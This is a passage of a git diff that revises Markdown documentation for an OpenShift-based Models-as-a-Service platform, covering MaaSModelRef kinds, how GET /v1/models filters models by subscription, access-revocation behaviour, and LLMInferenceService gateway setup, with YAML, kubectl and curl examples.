-- **Supported kind today:** `LLMInferenceService` (also accepts the alias `llmisvc` for backwards compatibility). The MaaS controller reconciles MaaSModelRefs whose **modelRef** points to an LLMInferenceService (by name and optional namespace). It sets `status.endpoint` from the LLMInferenceService status and `status.phase` from its readiness.
-- **API behavior:** The API reads MaaSModelRefs from the informer cache, maps each to an API model (`id`, `url`, `ready`, `kind`, etc.), then **validates access** by probing each model's `/v1/models` endpoint with the request's **Authorization header** (passed through as-is). Only models that return 2xx or 405 are included.
-- **Kind on the wire:** Each model in the GET /v1/models response can carry a `kind` field (e.g. `LLMInferenceService`) from `spec.modelRef.kind` for clients or tooling.
+### LLMInferenceService
+
+The `LLMInferenceService` kind (also accepts the alias `llmisvc` for backwards compatibility) references models deployed on the cluster via the LLMInferenceService CRD. The controller:
+- Sets `status.endpoint` from the LLMInferenceService status
+- Sets `status.phase` from LLMInferenceService readiness
+
+### ExternalModel
+
+The `ExternalModel` kind references external AI/ML providers (e.g., OpenAI, Anthropic, Azure OpenAI). When using this kind:
+1. Create an [ExternalModel](../reference/crds/external-model.md) CR with provider, endpoint, and credential reference
+2. Create a MaaSModelRef that references the ExternalModel by name
+
+The controller:
+- Fetches the ExternalModel CR from the same namespace
+- Validates the user-supplied HTTPRoute references the correct gateway
+- Derives `status.endpoint` from HTTPRoute hostnames or gateway addresses
+- Sets `status.phase` based on HTTPRoute acceptance by the gateway
+
+## API Behavior
+
+- The API reads MaaSModelRefs cluster-wide, maps each to an API model (`id`, `url`, `ready`, `kind`, etc.)
+- **Access validation**: Probes each model's `/v1/models` endpoint with the request's Authorization header. Only models that return 2xx or 405 are included.
+- **Kind on the wire**: Each model in the GET /v1/models response carries a `kind` field from `spec.modelRef.kind`
 
 ## Adding a new kind in the future
 
@@ -66,7 +84,7 @@ To support a new backend type (a new **kind** in `spec.modelRef`):
      - **Option B:** Extend the API's access-validation logic to branch on **kind** and use a kind-specific probe (different URL path or client), while keeping the same contract: include a model only if the probe with the user's token succeeds.
 
 3. **Enrichment (optional)**
-   - Extra metadata (e.g. display name) can be set by the controller in status or annotations and mapped into the model response. For a new kind, add a small branch in the MaaSModelRef → API model conversion if needed.
+   - The API reads standard annotations from MaaSModelRef (`openshift.io/display-name`, `openshift.io/description`, `opendatahub.io/genai-use-case`, `opendatahub.io/context-window`) and returns them in the `modelDetails` field of the GET /v1/models response. See [CRD annotations](crd-annotations.md) for the full list. For a new kind, add a small branch in the MaaSModelRef → API model conversion if needed.
 
 4. **RBAC**
    - If the new kind’s reconciler or the API needs to read another resource, add the corresponding **list/watch** (and optionally **get**) permissions to the maas-api ClusterRole and/or the controller’s RBAC.
@@ -74,6 +92,6 @@ To support a new backend type (a new **kind** in `spec.modelRef`):
 ## Summary
 
 - **modelRef** is the backend reference (kind, name, optional namespace), analogous to [Gateway API BackendRef](https://gateway-api.sigs.k8s.io/reference/spec/#backendref).
-- **Listing:** Always from MaaSModelRef cache; no kind-specific listing logic.
+- **Listing:** Always from MaaSModelRef resources cluster-wide; no kind-specific listing logic.
 - **Access validation:** Same probe (GET endpoint with the request's Authorization header as-is) for all kinds unless kind-specific probes are added later.
 - **New kinds:** Implement in the controller (resolve referent, set status.endpoint and status.phase); extend the API only if the new kind cannot use the same probe path or needs different enrichment.
diff --git a/docs/content/configuration-and-management/maas-models.md b/docs/content/configuration-and-management/maas-models.md
new file mode 100644
index 000000000..1deed3a6c
--- /dev/null
+++ b/docs/content/configuration-and-management/maas-models.md
@@ -0,0 +1,50 @@
+# MaaS Models
+
+MaaS uses **MaaSModelRef** to identify model servers that live on the cluster. Each MaaSModelRef is a reference to a model server—it holds the information MaaS needs to perform authentication, authorization, and rate limiting.
+
+By using a single unified object (MaaSModelRef) for all model types, MaaS can handle different kinds of model servers—each with its own backend and lifecycle—through one consistent interface. The controller uses a **provider paradigm** to distinguish between types: each model type (for example, LLMInferenceService, external APIs) has a provider that knows how to reconcile and resolve that type. Today, vLLM (via LLMInferenceService) is the supported provider; additional providers may be added in the future.
+
+## The Model Reference
+
+A MaaS model is a reference to a model server (for example, an LLMInferenceService or external API). The MaaS controller, running in the **control plane**, reconciles these references and gathers the information needed to route requests and enforce policies—such as the model's endpoint URL and readiness status.
+
+That information is then used by MaaSSubscription and MaaSAuthPolicy to complete their logic: validating access, selecting subscriptions, and enforcing rate limits.
+
+## How Model Information Is Used
+
+Both **MaaSAuthPolicy** (access) and **MaaSSubscription** (quota) reference models by their **MaaSModelRef** name. They rely on the information that MaaSModelRef provides—gathered at the control plane—to:
+
+- Route requests to the correct model endpoint
+- Validate that the user has access to the requested model
+- Apply the correct rate limits for that model
+
+```mermaid
+flowchart LR
+    subgraph Downstream ["Downstream (cluster)"]
+        ModelServer["Model Server<br/>(e.g. LLMInferenceService)"]
+    end
+
+    MaaSModelRef["MaaSModelRef"]
+
+    subgraph Policies ["Policies"]
+        MaaSAuthPolicy["MaaSAuthPolicy"]
+        MaaSSubscription["MaaSSubscription"]
+    end
+
+    ModelServer -->|"1. Fetches endpoint,<br/>status, etc."| MaaSModelRef
+    MaaSModelRef -->|"2. Feeds model info"| MaaSAuthPolicy
+    MaaSModelRef -->|"2. Feeds model info"| MaaSSubscription
+
+    style MaaSModelRef fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff
+    style MaaSAuthPolicy fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style MaaSSubscription fill:#e65100,stroke:#333,stroke-width:2px,color:#fff
+    style ModelServer fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff
+```
+
+## Summary
+
+- **MaaSModelRef** — Stores the reference to a model server; the controller gathers the information needed for auth and routing.
+- **MaaSAuthPolicy** and **MaaSSubscription** — Reference models by name and use that information to enforce access and quota.
+- **Control plane** — The MaaS controller reconciles model references and populates the data that policies and subscriptions depend on.
+
+For configuration details and how to create and use MaaSModelRef, see [Quota and Access Configuration](quota-and-access-configuration.md) in the Administration Guide.
diff --git a/docs/content/configuration-and-management/model-access-behavior.md b/docs/content/configuration-and-management/model-access-behavior.md
index 57e6b0194..1bcda9b87 100644
--- a/docs/content/configuration-and-management/model-access-behavior.md
+++ b/docs/content/configuration-and-management/model-access-behavior.md
@@ -1,166 +1,49 @@
-# Model Tier Access Behavior
+# Model Access Behavior
 
-This document describes the expected behaviors and operational considerations when modifying model tier access in the MaaS Platform Technical Preview release.
+This document describes the expected behaviors and operational considerations when modifying model access (subscription) in the MaaS Platform.
 
-## Model Tier Access Changes During Active Usage
+## Model Access Changes During Active Usage
 
 ### Overview
 
-When a model is removed from a tier's access list (by updating the `alpha.maas.opendatahub.io/tiers` annotation on an `LLMInferenceService` resource), access revocation takes effect immediately. This section describes the expected behaviors and considerations for administrators.
+When a model is removed from a subscription's access list (by updating MaaSAuthPolicy or MaaSSubscription), access revocation takes effect according to how the gateway enforces policies. This section describes the expected behaviors and considerations for administrators.
 
 ### How Model Access Removal Works
 
-1. **Annotation Update**: The administrator updates the `alpha.maas.opendatahub.io/tiers` annotation to remove a tier from the allowed list
-2. **ODH Controller Processing**: The ODH Controller detects the annotation change and updates RBAC resources
-3. **RBAC Update**: The RoleBinding for the removed tier is deleted, revoking POST permissions for that tier's service accounts
-4. **Access Revocation**: Users from the removed tier lose access to the model
+1. **Policy Update**: The administrator updates MaaSAuthPolicy or MaaSSubscription to remove access to a model
+2. **Controller Processing**: The maas-controller reconciles the change and updates AuthPolicy/TokenRateLimitPolicy resources
+3. **Gateway Enforcement**: The gateway (via Authorino) enforces the updated policies
+4. **Access Revocation**: Users lose access to the model per the new policy
 
 ### Expected Behaviors
 
 #### 1. Impact on Active Requests
 
-Access revocation prevents new requests immediately.
+Access revocation prevents new requests once the gateway has the updated policy.
 
-**Description**:
+- **New Requests**: Any request arriving after policy propagation will be denied.
+- **In-Flight Requests**: Requests that have already passed the authorization gate typically complete successfully.
 
-- **New Requests**: Any request arriving after the RBAC update will be denied immediately.
-- **In-Flight Requests**: Requests that have already passed the authorization gate typically complete successfully. However, dependent requests or long-running sessions requiring re-authorization will fail.
+#### 2. Policy Propagation Delay
 
-**Example Scenario**:
-
-```text
-1. User starts a long-running inference request (e.g., 2-minute generation)
-2. Administrator removes the tier from model annotation at 30 seconds
-3. ODH Controller updates RBAC at 45 seconds
-4. Request may fail at next authorization checkpoint (if any)
-```
-
-**Workaround**:
-
-- Avoid removing tier access during peak usage periods
-- Monitor active requests before making changes
-- Consider using maintenance windows for tier access changes
-
-#### 2. RBAC Propagation Delay
-
-**Description**:
-
-- There is a delay between annotation update and RBAC resource update by the ODH Controller
-- During this window (typically seconds to minutes), access behavior is inconsistent:
-  - Some requests may still succeed (if authorization was cached)
-  - New requests may fail immediately
-  - Model may still appear in user's model list but be inaccessible
-
-**Example Timeline**:
-
-```text
-T+0s:  Annotation updated (remove "premium" tier)
-T+5s:  ODH Controller detects change
-T+10s: RoleBinding deleted
-T+15s: RBAC fully propagated to API server
-```
-
-**Workaround**:
-
-- Wait 1-2 minutes after annotation update before verifying access changes
-- Monitor ODH Controller logs to confirm RBAC updates are complete
-- Use `kubectl get rolebinding -n <model-namespace>` to verify RoleBinding removal
+There may be a delay between policy update and gateway enforcement. During this window, access behavior can be inconsistent. Wait 1–2 minutes after policy updates before verifying changes.
 
 #### 3. Model List Visibility vs. Access
 
-**Description**:
-
-- The **GET /v1/models** endpoint lists models from MaaSModelRef CRs and **filters by access**: it probes each model’s `/v1/models` endpoint with the client’s **Authorization** header (passed through as-is). Only models that return 2xx or 405 are included.
-- So after tier removal, a model that the client can no longer access should **not** appear in their list (the probe will get 401/403 and the model is excluded).
-- If there is a short delay between the tier change and the gateway enforcing it, a client might still see a model briefly until their next list call, or see it disappear on the next call.
-
-**Note**: See [Model listing flow](model-listing-flow.md) for the full flow. Token exchange is not performed; the same Authorization header the client sends is used for the probe.
-
-#### 4. Token Validity vs. Model Access (Expected Behavior)
-
-Tokens are per-user (Service Account), not per-model. Token validity and model access are independent—this is by design.
-
-**Description**:
-
-- Service Account tokens issued before tier removal remain valid until expiration
-- Model access is controlled by RBAC, which is updated independently of token validity
-- When a model is removed from a tier, the RBAC change revokes access immediately
-- Users do not need to request new tokens; their existing tokens simply have access to fewer models
-
-**Example**:
+The **GET /v1/models** endpoint lists models from MaaSModelRef CRs and **filters by access**: it probes each model's endpoint with the client's **Authorization** header. Only models that return 2xx or 405 are included. After access removal, a model the client can no longer access should not appear in their list.
 
-```text
-1. User receives token at T+0 (valid for 1 hour)
-2. User has access to models A, B, C (via RBAC)
-3. Model B removed from tier at T+30min (RBAC updated)
-4. Token still valid, but model access changes:
-   - Model A: ✅ Accessible (RBAC allows)
-   - Model B: ❌ No longer accessible (RBAC denies)
-   - Model C: ✅ Accessible (RBAC allows)
-```
+#### 4. Token Validity vs. Model Access
 
-**User Communication**:
-
-- Clearly message users when a model is being removed from a tier to set expectations regarding token validity vs. model access.
-
-#### 5. Immediate Access Revocation
-
-**Description**:
-
-- The platform does not provide a "drain" mechanism to allow existing users to finish their sessions while blocking new ones.
-- Revocation applies to the authorization policy immediately.
-- While in-flight requests often complete (as they have passed the gate), the user experience is an immediate loss of access for any subsequent interaction.
-
-**Workaround**:
-
-- Monitor active requests before making changes:
-
-  ```bash
-  # Check for active connections (example)
-  kubectl top pods -n <model-namespace>
-  ```
-
-- Use maintenance windows for tier access changes
-- Consider implementing request draining in future releases
+API keys and tokens are per-identity, not per-model. Token validity and model access are independent. When access to a model is revoked, existing tokens simply have access to fewer models; users do not need to request new tokens.
 
 ### Recommended Practices
 
-1. **Plan Tier Access Changes**:
-   - Schedule changes during low-usage periods
-   - Notify affected users in advance when possible
-   - Monitor active requests before making changes
-
-2. **Verify Changes**:
-
-   - Wait 1-2 minutes after annotation update
-   - Verify RoleBinding removal:
-
-     ```bash
-     kubectl get rolebinding -n <model-namespace> | grep <tier-name>
-     ```
-
-   - Test access with a token from the affected tier
-
-3. **Monitor for Issues**:
-   - Check ODH Controller logs for RBAC update errors
-   - Monitor API server logs for authorization failures
-   - Watch for increased error rates in user applications
-
-4. **Handle Errors Gracefully**:
-   - Implement retry logic with exponential backoff
-   - Provide clear error messages to end users
-   - Log access denials for troubleshooting
-
-### Future Enhancements
-
-The following improvements are planned for future releases:
-
-1. **Graceful Shutdown**: Implement request draining before access revocation
-2. **Real-time Notifications**: Notify users when tier access changes
-3. **Audit Logging**: Enhanced logging for tier access changes
+1. **Plan Access Changes**: Schedule changes during low-usage periods and notify affected users when possible.
+2. **Verify Changes**: Wait 1–2 minutes after policy updates, then test access.
+3. **Monitor for Issues**: Check maas-controller and gateway logs for policy update errors.
 
 ### Related Documentation
 
-- [Tier Configuration](./tier-configuration.md) - How to configure tier access
-- [Model Setup](./model-setup.md) - How to configure model tier annotations
-- [Token Management](./token-management.md) - Understanding token lifecycle
+- [Quota and Access Configuration](quota-and-access-configuration.md) - How to configure subscription and access
+- [Model Setup (On Cluster)](model-setup.md) - How to configure models for MaaS
+- [Token Management](token-management.md) - Understanding token lifecycle
diff --git a/docs/content/configuration-and-management/model-listing-flow.md b/docs/content/configuration-and-management/model-listing-flow.md
index aadff2c52..18485067a 100644
--- a/docs/content/configuration-and-management/model-listing-flow.md
+++ b/docs/content/configuration-and-management/model-listing-flow.md
@@ -2,7 +2,7 @@
 
 This document describes how the **GET /v1/models** endpoint discovers and returns the list of available models.
 
-The list is **based on MaaSModelRef** custom resources: the API returns models that are registered as MaaSModelRefs in its configured namespace.
+The list is **based on MaaSModelRef** custom resources: the API considers MaaSModelRef objects cluster-wide (all namespaces), then filters by access.
 
 ## Overview
 
@@ -17,15 +17,17 @@ Each entry includes an `id`, **`url`** (the model’s endpoint), a `ready` flag,
 
 ## MaaSModelRef flow
 
-When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed and the API is configured with a MaaSModelRef lister and namespace, the flow is:
+When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed and the API is configured with a MaaSModelRef lister, the flow is:
 
-1. The MaaS API lists all **MaaSModelRef** custom resources in its configured namespace (e.g. `opendatahub`). It reads them from an **in-memory cache** in the maas-api component (maintained by a Kubernetes informer), so it does not call the Kubernetes API on every request.
+1. The MaaS API discovers **MaaSModelRef** custom resources **cluster-wide** (all namespaces) without calling the Kubernetes API on every request.
 
 2. For each MaaSModelRef, it reads **id** (`metadata.name`), **url** (`status.endpoint`), **ready** (`status.phase == "Ready"`), and related metadata. The controller has populated `status.endpoint` and `status.phase` from the underlying LLMInferenceService (for llmisvc) or HTTPRoute/Gateway.
 
 3. **Access validation**: The API probes each model’s `/v1/models` endpoint with the **exact Authorization header** the client sent (passed through as-is). Only models that return **2xx**, **3xx** or **405** are included in the response. This ensures the list only shows models the client is authorized to use.
 
-4. The filtered list is returned to the client.
+4. For each model, the API reads **annotations** from the MaaSModelRef to populate `modelDetails` in the response (display name, description, use case, context window). See [CRD annotations](crd-annotations.md) for the full list.
+
+5. The filtered list is returned to the client.
 
 ```mermaid
 sequenceDiagram
@@ -53,9 +55,110 @@ sequenceDiagram
 
 - **Consistent with gateway**: The same model names and routes are used for inference; the list matches what the gateway will accept for that client.
 
-If the API is not configured with a MaaSModelRef lister and namespace, or if listing fails (e.g. CRD not installed, no RBAC, or server error), the API returns an empty list or an error.
+If the API is not configured with a MaaSModelRef lister, or if listing fails (e.g. CRD not installed, no RBAC, or server error), the API returns an empty list or an error.
+
+## Subscription Filtering and Aggregation
+
+The `/v1/models` endpoint automatically filters models based on your authentication method and optional headers.
+
+### Authentication-Based Behavior
+
+#### API Key Authentication (Bearer sk-oai-*)
+When using an API key, the subscription is automatically determined from the key:
+- Returns **only** models from the subscription bound to the API key at mint time
+
+```bash
+# API key bound to "premium-subscription"
+curl -H "Authorization: Bearer sk-oai-abc123..." \
+     https://maas.example.com/maas-api/v1/models
+
+# Returns models from "premium-subscription" only
+```
+
+#### User Token Authentication (OpenShift/OIDC tokens)
+When using a user token, you have flexible options:
+
+**Default (no X-MaaS-Subscription header)**:
+- Returns **all** models from all subscriptions you have access to
+- Models are deduplicated and subscription metadata is attached
+
+```bash
+# User with access to "basic" and "premium" subscriptions
+curl -H "Authorization: Bearer $(oc whoami -t)" \
+     https://maas.example.com/maas-api/v1/models
+
+# Returns models from both subscriptions with subscription metadata
+```
+
+**With X-MaaS-Subscription header** (optional):
+- Returns only models from the specified subscription
+- Behaves like an API key request - allows you to scope your query to a specific subscription
+
+```bash
+# Filter to only "premium" subscription models
+curl -H "Authorization: Bearer $(oc whoami -t)" \
+     -H "X-MaaS-Subscription: premium-subscription" \
+     https://maas.example.com/maas-api/v1/models
+
+# Returns only "premium-subscription" models
+```
+
+!!! tip "User token filtering"
+    The `X-MaaS-Subscription` header allows user token requests to filter results to a specific subscription. This is useful when you have access to many subscriptions but only want to see models from one.
+
+### Subscription Metadata
+
+All models in the response include a `subscriptions` array with metadata for each subscription providing access to that model:
+
+```json
+{
+  "object": "list",
+  "data": [
+    {
+      "id": "llama-2-7b-chat",
+      "created": 1672531200,
+      "object": "model",
+      "owned_by": "model-namespace",
+      "url": "https://maas.example.com/llm/llama-2-7b-chat",
+      "ready": true,
+      "subscriptions": [
+        {
+          "name": "basic-subscription",
+          "displayName": "Basic Tier",
+          "description": "Basic subscription with standard rate limits"
+        },
+        {
+          "name": "premium-subscription",
+          "displayName": "Premium Tier",
+          "description": "Premium subscription with higher rate limits"
+        }
+      ]
+    }
+  ]
+}
+```
+
+### Deduplication Behavior
+
+Models are deduplicated by `(id, url, ownedBy)` key:
+
+- **Same id + same URL + same MaaSModelRef (ownedBy)**: Single entry with subscriptions aggregated into the `subscriptions` array
+- **Different id, URL, or MaaSModelRef**: Separate entries
+
+**User token authentication** (multiple subscriptions):
+- Model `gpt-3.5` from MaaSModelRef `namespace-a/model-a` at URL `https://example.com/gpt-3.5` is accessible via subscriptions A and B
+  - Result: One entry with `subscriptions: [{name: "A"}, {name: "B"}]`
+- Model `gpt-3.5` from MaaSModelRef `namespace-b/model-b` at the same URL is only in subscription B
+  - Result: Separate entry with `subscriptions: [{name: "B"}]` (different MaaSModelRef)
+- Model `gpt-3.5` at URL `https://example.com/gpt-3.5-premium` from `namespace-a/model-a` is only in subscription B
+  - Result: Separate entry with `subscriptions: [{name: "B"}]` (different URL)
+
+**API key authentication** (single subscription):
+- Deduplication handles edge cases where multiple MaaSModelRef resources point to the same model endpoint
+- Each unique MaaSModelRef resource appears as a separate entry
 
-For how to add new MaaSModelRef **kinds** (backend types) in the future, see [MaaSModelRef kinds (future)](maas-model-kinds.md).
+!!! tip "Subscription metadata fields"
+    The `displayName` and `description` fields are read from the MaaSSubscription CRD's `spec.displayName` and `spec.description` fields. If these fields are not set in the CRD, they will be empty strings in the response.
 
 ## Registering models
 
@@ -71,14 +174,18 @@ To have models appear via the **MaaSModelRef** flow:
         kind: MaaSModelRef
         metadata:
           name: my-model-name   # This becomes the model "id" in GET /v1/models
-          namespace: opendatahub
+          namespace: llm          # Same namespace as the LLMInferenceService
+          annotations:
+            openshift.io/display-name: "My Model"                  # optional: human-readable name
+            openshift.io/description: "A general-purpose LLM"      # optional: description
+            opendatahub.io/genai-use-case: "chat"                  # optional: use case
+            opendatahub.io/context-window: "4096"                  # optional: context window
         spec:
           modelRef:
             kind: LLMInferenceService
             name: my-llm-isvc-name
-            namespace: llm
 
-4. The controller reconciles the MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API (in the same namespace) will then include this model in GET /v1/models when it lists MaaSModelRef CRs.
+4. The controller reconciles the MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API will then include this model in GET /v1/models when it lists MaaSModelRef CRs.
 
 You can use the [maas-system samples](https://github.com/opendatahub-io/models-as-a-service/tree/main/docs/samples/maas-system) as a template; the install script deploys LLMInferenceService + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription together so dependencies resolve correctly.
 
@@ -87,5 +194,5 @@ You can use the [maas-system samples](https://github.com/opendatahub-io/models-a
 ## Related documentation
 
 - [MaaS Controller README](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) — install and MaaSModelRef/MaaSAuthPolicy/MaaSSubscription
-- [Model setup](./model-setup.md) — configuring LLMInferenceServices (gateway reference, tier annotation) as backends for MaaSModelRef
+- [Model setup](./model-setup.md) — configuring LLMInferenceServices (gateway reference) as backends for MaaSModelRef
 - [Architecture](../architecture.md) — overall MaaS architecture
diff --git a/docs/content/configuration-and-management/model-setup.md b/docs/content/configuration-and-management/model-setup.md
index 455bd24c3..1622e453c 100644
--- a/docs/content/configuration-and-management/model-setup.md
+++ b/docs/content/configuration-and-management/model-setup.md
@@ -1,19 +1,37 @@
-# Model Setup Guide
+# Model Setup (On Cluster) Guide
 
 This guide explains how to configure models so they appear in the MaaS platform and are subject to authentication, rate limiting, and token-based consumption tracking.
 
+!!! tip "Subscription model (recommended)"
+    When using the **MaaS controller**, model access and rate limits are controlled by **MaaSModelRef**, **MaaSAuthPolicy**, and **MaaSSubscription** CRDs. See [Quota and Access Configuration](quota-and-access-configuration.md) and [Model Listing Flow](model-listing-flow.md).
+
+## Supported model types
+
+MaaS is planning support for multiple model types through a **provider paradigm**: each MaaSModelRef references a model backend by `kind` (e.g., `LLMInferenceService`, `ExternalModel`). The controller uses provider-specific logic to reconcile and resolve each type.
+
+**LLMInferenceService** will be initially supported. The initial release focuses on using KServe for on-cluster models. This guide describes the configuration differences between the default LLMInferenceService and the MaaS-enabled one to help users understand the differences.
+
 ## How the model list is built
 
-The **GET /v1/models** endpoint (and thus "which models are available") can be built in two ways:
+When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed, you register models by creating **MaaSModelRef** CRs that reference a model backend (e.g., an LLMInferenceService). The controller reconciles each MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API lists these MaaSModelRef CRs and returns them as the model list. Access and quotas are controlled by **MaaSAuthPolicy** and **MaaSSubscription**. See [Model listing flow](model-listing-flow.md) for details.
 
-1. **MaaSModelRef (recommended when using the MaaS controller)**  
-   When the [MaaS controller](https://github.com/opendatahub-io/models-as-a-service/tree/main/maas-controller) is installed, you register models by creating **MaaSModelRef** CRs that reference an LLMInferenceService. The controller reconciles each MaaSModelRef and sets `status.endpoint` and `status.phase`. The MaaS API lists these MaaSModelRef CRs and returns them as the model list. Access and quotas are controlled by **MaaSAuthPolicy** and **MaaSSubscription**. See [Model listing flow](model-listing-flow.md) for details.
+## MaaS-capable vs standard gateways
 
-Model listing is from MaaSModelRef CRs (cached via informer). The sections below focus on **LLMInferenceService** configuration (gateway reference, tier annotation) for use as the backend referenced by MaaSModelRef.
+MaaS uses a **segregated gateway approach**. Models explicitly opt in to MaaS capabilities by routing through the **MaaS gateway** (`maas-default-gateway`). Models that use the **standard gateway** (ODH/KServe default) do not use MaaS policies.
 
-## Gateway Architecture
+| | Standard gateway (ODH/KServe) | MaaS gateway (`maas-default-gateway`) |
+|--|-----------------------------|--------------------------------------|
+| **Authentication** | Existing ODH/KServe auth model | Token-based (API keys, OpenShift tokens) |
+| **Rate limits** | None | Subscription-based (Limitador) |
+| **Token consumption** | Not tracked | Tracked per usage |
+| **Access control** | Platform-level | Per-model (MaaSAuthPolicy, MaaSSubscription) |
+| **Use case** | Standard inference without MaaS policies | MaaS-managed access, quotas, and tracking |
 
-The MaaS platform uses a **segregated gateway approach**, where models explicitly opt-in to MaaS capabilities by referencing the `maas-default-gateway`. This provides flexibility and isolation between different model deployment scenarios.
+Models that use the standard gateway do not appear in the MaaS model list and are not subject to MaaS policies. To use MaaS features, configure your model to route through the MaaS gateway.
+
+## Gateway architecture (diagram)
+
+The diagram below shows how models can route through either gateway.
 
 ```mermaid
 %%{init: {'theme':'base', 'themeVariables': { 'fontSize':'16px', 'fontFamily':'system-ui, -apple-system, sans-serif', 'edgeLabelBackground':'transparent', 'labelBackground':'transparent', 'tertiaryColor':'transparent'}}}%%
@@ -21,7 +39,7 @@ graph TB
     subgraph cluster["OpenShift/K8s Cluster"]
         subgraph gateways["Gateway Layer"]
             defaultGW["Default Gateway<br/>(ODH/KServe)<br/><br/>✓ Existing auth model<br/>✓ No rate limits<br/>"]
-            maasGW["MaaS Gateway<br/>(maas-default-gateway)<br/><br/>✓ Token authentication<br/>✓ Tier-based rate limits<br/>✓ Token consumption "]
+            maasGW["MaaS Gateway<br/>(maas-default-gateway)<br/><br/>✓ Token authentication<br/>✓ Subscription-based rate limits<br/>✓ Token consumption "]
         end
 
         subgraph models["Model Deployments"]
@@ -48,30 +66,27 @@ graph TB
 !!! note
     The `maas-default-gateway` is created automatically during MaaS platform installation. You don't need to create it manually.
 
-### Benefits
+### Benefits of the segregated approach
 
 - **Flexibility**: Different models can have different security and access requirements
-- **Progressive Adoption**: Teams can adopt MaaS features incrementally
-- **Production Control**: Production models get full policy enforcement if needed
-- **Multi-Tenancy**: Different teams can use different gateways in the same cluster
-- **Blast Radius Containment**: Issues with one gateway don't affect the other
+- **Progressive adoption**: Teams can adopt MaaS features incrementally
+- **Production control**: Production models get full policy enforcement when routed through the MaaS gateway
+- **Multi-tenancy**: Different teams can use different gateways in the same cluster
+- **Blast radius containment**: Issues with one gateway don't affect the other
 
 ## Prerequisites
 
-Before configuring a model for MaaS, ensure you have:
+Before configuring an LLMInferenceService for MaaS, ensure you have:
 
 - **MaaS platform installed** with `maas-default-gateway` deployed
 - **LLMInferenceService** resource created or planned
 - **Cluster admin** or equivalent permissions to modify `LLMInferenceService` resources
 
-## Configuring Models for MaaS
-
-To make your model available through the MaaS platform, you need to:
+## Configuring LLMInferenceService for MaaS
 
-1. **Reference the maas-default-gateway** in your `LLMInferenceService` spec
-2. **Add the tier annotation** to enable automatic RBAC setup
+To make your LLMInferenceService available through the MaaS platform, **reference the maas-default-gateway** in the `LLMInferenceService` spec. This routes traffic through the MaaS gateway so authentication, rate limiting, and consumption tracking apply.
 
-### Step 1: Add Gateway Reference
+### Add gateway reference
 
 Configure your `LLMInferenceService` to use the `maas-default-gateway` by adding the gateway reference in the `router` section:
 
@@ -99,13 +114,13 @@ spec:
     # ... container configuration ...
 ```
 
-**Key Points:**
+**Key points:**
 
 - The `router.gateway.refs` field specifies which gateway to use
 - Use `name: maas-default-gateway` and `namespace: openshift-ingress`
-- **Without this specification**, the model uses the default KServe gateway and **is not subject to MaaS policies**
+- **Without this specification**, the LLMInferenceService uses the default KServe gateway and **is not subject to MaaS policies**
 
-### Step 2: Configure Tier Access with Annotation
+### Complete example
 
 Add the `alpha.maas.opendatahub.io/tiers` annotation to enable automatic RBAC setup for tier-based access:
 
@@ -144,6 +159,29 @@ annotations:
   alpha.maas.opendatahub.io/tiers: '["premium","enterprise"]'
 ```
 
+### Step 3: Add Display Metadata (Optional)
+
+Add standard annotations to your **MaaSModelRef** to provide human-readable names and descriptions in the `GET /v1/models` API response:
+
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: my-production-model
+  namespace: llm
+  annotations:
+    openshift.io/display-name: "My Production Model"
+    openshift.io/description: "A fine-tuned model for production workloads"
+    opendatahub.io/genai-use-case: "chat"
+    opendatahub.io/context-window: "8192"
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: my-production-model
+```
+
+These annotations are returned in the `modelDetails` field of the API response. All are optional. See [CRD annotations](crd-annotations.md) for the full list of supported annotations across all MaaS CRDs.
+
 ### What the Annotation Does
 
 This annotation automatically creates the necessary RBAC resources (Roles and RoleBindings) that allow tier-specific service accounts to POST to your `LLMInferenceService`. The ODH Controller handles this automatically when the annotation is present.
@@ -155,7 +193,7 @@ Behind the scenes, it creates:
 
 ### Complete Example
 
-Here's a complete example of a MaaS-enabled model:
+Here's a complete example of an LLMInferenceService configured for MaaS:
 
 ```yaml
 apiVersion: serving.kserve.io/v1alpha1
@@ -163,8 +201,6 @@ kind: LLMInferenceService
 metadata:
   name: qwen3-model
   namespace: llm
-  annotations:
-    alpha.maas.opendatahub.io/tiers: '[]'
 spec:
   model:
     uri: hf://Qwen/Qwen3-0.6B
@@ -189,9 +225,9 @@ spec:
             memory: 8Gi
 ```
 
-## Updating Existing Models
+## Updating existing models
 
-To convert an existing model to use MaaS:
+To convert an existing LLMInferenceService to use MaaS:
 
 ### Method 1: Patch the Model
 
@@ -207,10 +243,6 @@ kubectl patch llminferenceservice my-production-model -n llm --type='json' -p='[
   }
 ]'
 
-# Add the tier annotation
-kubectl annotate llminferenceservice my-production-model -n llm \
-  alpha.maas.opendatahub.io/tiers='[]' \
-  --overwrite
 ```
 
 ### Method 2: Edit the Resource
@@ -219,14 +251,11 @@ kubectl annotate llminferenceservice my-production-model -n llm \
 kubectl edit llminferenceservice my-production-model -n llm
 ```
 
-Then add:
-
-- Gateway reference in `spec.router.gateway.refs`
-- Annotation `alpha.maas.opendatahub.io/tiers` in `metadata.annotations`
+Then add the gateway reference in `spec.router.gateway.refs`.
 
 ## Verification
 
-After configuring your model, verify it's accessible through MaaS:
+After configuring your LLMInferenceService, verify it's accessible through MaaS:
 
 **1. Check the model appears in the models list:**
 
@@ -243,13 +272,7 @@ curl -sSk ${HOST}/maas-api/v1/models \
 kubectl get llminferenceservice my-production-model -n llm
 ```
 
-**3. Check RBAC was created (if using tier annotation):**
-
-```bash
-kubectl get roles,rolebindings -n llm | grep my-production-model
-```
-
-**4. Test inference request:**
+**3. Test inference request:**
 
 ```bash
 # Use the MODEL_URL from the models list
@@ -269,23 +292,20 @@ curl -sSk -H "Authorization: Bearer $TOKEN" \
 
 ### 401 Unauthorized When Accessing Model
 
-- Verify the tier annotation is set: `alpha.maas.opendatahub.io/tiers: '[]'` (or specific tiers)
-- Check that your token's tier matches one of the tiers allowed in the annotation
